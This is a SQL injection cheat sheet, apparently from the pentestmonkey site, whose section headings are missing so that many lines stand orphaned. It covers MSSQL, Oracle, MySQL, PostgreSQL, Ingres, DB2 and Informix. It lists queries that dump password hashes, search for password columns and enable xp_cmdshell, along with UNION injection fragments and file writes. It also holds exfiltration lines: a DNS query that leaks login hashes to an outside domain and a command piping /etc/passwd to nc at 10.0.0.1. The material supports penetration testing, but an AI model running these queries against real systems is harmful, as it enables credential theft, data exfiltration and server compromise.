SELECT /*comment*/1

SELECT system_user;

SELECT user;

SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

SELECT
name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins —
priv, mssql 2000. Need to convert to hex to return hashes in MSSQL
error message / some version of query analyzer.

SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;

SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005

SELECT
is_srvrolemember(’sysadmin’); — is your account a sysadmin? returns 1
for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’,
’systemadmin’ and other values from the documentation

SELECT is_srvrolemember(’sysadmin’, ’sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.

SELECT DB_NAME(N); — for N = 0, 1, 2, …

SELECT
master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name=’sometable’; — list colum names and types for
master..sometable

SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;

SELECT
master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name=’sometable’; — list colum names and types for
master..sometable

SELECT sysobjects.name
as tablename, syscolumns.name as columnname FROM sysobjects JOIN
syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype =
‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column
for each column containing the word ‘password’

SELECT 6 & 1 — returns 0

SELECT CAST(1 as char)

declare @host varchar(800); select
@host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) +
‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\\’ +
@host + ‘\c$\boot.ini”’); — priv, works on 2005

– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.

– Also check out theDNS tunnel feature of sqlninja

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:

EXEC sp_configure ’show advanced options’, 1; — priv

RECONFIGURE; — priv

EXEC sp_configure ‘xp_cmdshell’, 1; — priv

RECONFIGURE; — priv

BULK INSERT mydata FROM ‘c:\boot.ini’;

DROP TABLE mydata;

model

msdb

pubs

tempdb

SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;

SELECT version FROM v$instance;

–
NB: SELECT statements must have a FROM clause in Oracle so we have to
use the dummy table name ‘dual’ when we’re not actually selecting from
a table.

SELECT name FROM sys.user$; — priv

SELECT name,spare4 FROM sys.user$ — priv, 11g

SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs

SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv

SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

SELECT name FROM v$database;

SELECT instance_name FROM v$instance;

SELECT SYS.DATABASE_NAME FROM DUAL;

– Also query TNS listener for other databases. See tnscmd (services | status).

SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;

SELECT owner, table_name FROM all_tables;

SELECT bitand(6,1) FROM dual; — returns0

SELECT CAST(‘1′ AS int) FROM dual;

SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2

SELECT UTL_INADDR.get_host_name(‘10.0.0.1′) FROM dual; — if reverse looks are slow

SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow

SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow

– Also see Heavy Queries to create a time delay

SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;

ExtProc can sometimes be used too, though it normally failed for me.

SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;

Java can be used to read and write files if it’s installed (it is not available in Oracle Express).

SELECT host_name FROM v$instance;

SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address

SELECT UTL_INADDR.get_host_name(‘10.0.0.1′) FROM dual; — gets hostnames

SYSAUX

SELECT /*comment*/1;

SELECT system_user();

SELECT
host, user, Select_priv, Insert_priv, Update_priv, Delete_priv,
Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,
File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,
Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,
Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; —
priv, list user privs

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns

SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv

SELECT distinct(db) FROM mysql.db — priv

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

SELECT 6 & 1; # returns 0

SELECT cast(‘123′ AS char);

SELECT CONCAT(‘A’,'B’,'C’); # returns ABC

SELECT SLEEP(5); # >= 5.0.12

SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system

mysql

SELECT /*comment*/1;

SELECT current_user;

SELECT session_user;

SELECT usename FROM pg_user;

SELECT getpgusername();

SELECT
DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE
‘%password%’;

SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

SELECT 6 & 1; –returns 0

SELECT CAST(‘1′ as int);

CREATE
OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ’sleep’
language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep
function. Taken from here .

SELECT * FROM dblink(‘host=put.your.hostname.here user=someuser dbname=somedb’, ‘SELECT version()’) RETURNS (result TEXT);

Alternatively,
if you have DBA rights you could run an OS-level command (see below) to
resolve hostnames, e.g. “ping pentestmonkey.net”.

SELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080′); — priv, commands run as postgres/pgsql OS-level user

COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres OS-level user

…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at a time

…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at a time …

DROP TABLE mytest mytest;

Write to a file:

CREATE TABLE mytable (mycol text);

INSERT INTO mytable(mycol) VALUES (”);

COPY
mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres
OS-level user. Generally you won’t be able to write to the web root,
but it’s always work a try.

– priv user can also read/write files by mapping libc functions

SELECT inet_server_port(); — returns db server IP address (or null if using local connection)

CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the same time

SELECT current_setting(‘hba_file’); — priv

template1

select 123; /* comment */

select dbmsinfo(’system_user’);

select name, password from iiuser;

select name, password from iiuser;

select dbmsinfo(‘create_table’);

select dbmsinfo(‘create_procedure’);

select dbmsinfo(’security_priv’);

select dbmsinfo(’select_syscat’);

select dbmsinfo(‘db_privileges’);

select dbmsinfo(‘current_priv_mask’);

select relid, relowner, relloc from iirelation;

select relid, relowner, relloc from iirelation where relowner != ‘$ingres’;

select top 10 blah from table;

select first 10 blah form table;

example of ANDing 3 and 5 together. The result is a “byte” type

with value \001:

select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

(The “ascii” function exists, but doesn’t seem to do what I’d expect.)

select cast(‘123′ as integer);

See Heavy Queries article for some ideas.

A pre-built Linux-based Ingres Database Server can be download from http://www.vmware.com/appliances/directory/832

There is a client called “sql” which can be used for local connections (at least) in the database server package above.

$ sql iidbdb

* select dbmsinfo(‘_version’); \go

select session_user from sysibm.sysdummy1;

select system_user from sysibm.sysdummy1;

Database authorities (like roles, I think) can be listed like this:

select grantee from syscat.dbauth;

select * from syscat.dbauth where grantee = current user;

select * from syscat.tabauth where grantee = current user;

name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

SELECT cast(1 as char) FROM sysibm.sysdummy1;

select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’

SELECT DBINFO(‘version’, ’server-type’) FROM systables WHERE tabid = 1;

SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’) FROM systables WHERE tabid = 1;

SELECT
DBINFO(‘version’, ‘os’) FROM systables WHERE tabid = 1; — T=Windows,
U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix,
F=64-bit app running on 64-bit unix

select CURRENT_ROLE FROM systables WHERE tabid = 1;

select procname, owner, grantor, grantee
from sysprocauth join sysprocedures on sysprocauth.procid =
sysprocedures.procid; — which procedures are accessible by which users

select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;

select bitand(6, 2) from systables where tabid = 1; — returns 2

select cast(1 as char) from systables where tabid = 1;

SELECT concat(‘A’, ‘B’) FROM systables where tabid = 1; — returns ‘AB’

sysmaster

sysadmin*

sysuser*

sysutils*

* = don’t seem to contain anything / don’t allow reading

I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (“emerge dev-java/jdbc-informix” on Gentoo).

• Click:
  Start | All Programs | IBM Informix Dynamic Server 11.50 |
  someservername. This will give you a command prompt with various
  Environment variables set properly.


• Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.

The
following were set on my test system. This may help if you get command
line access, but can’t get a GUI – you’ll need to change
“testservername”:

set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50

set INFORMIXSERVER=testservername

set ONCONFIG=ONCONFIG.testservername

set
PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib;C:\Program
Files\IBM\Informix\Clien-SDK\bin;C:\Program
Files\ibm\gsk7\bin;C:\Program Files\ibm\gsk7\lib

set
CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;C:\PROGRA~1\IBM\IBMINF~1\11.50\xtend\krakatoa\jdbc.jar;

set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp

set CLIENT_LOCALE=EN_US.CP1252

set DB_LOCALE=EN_US.8859-1

set SERVER_LOCALE=EN_US.CP1252

set DBLANG=EN_US.CP1252

mode con codepage select=1252

$ sudo nmap -sS -sV 10.0.0.1 -p- -v –version-all

…

1526/tcp open pdap-np?

9088/tcp open unknown

9089/tcp open unknown

…

TODO How would we identify Informix listening on the network?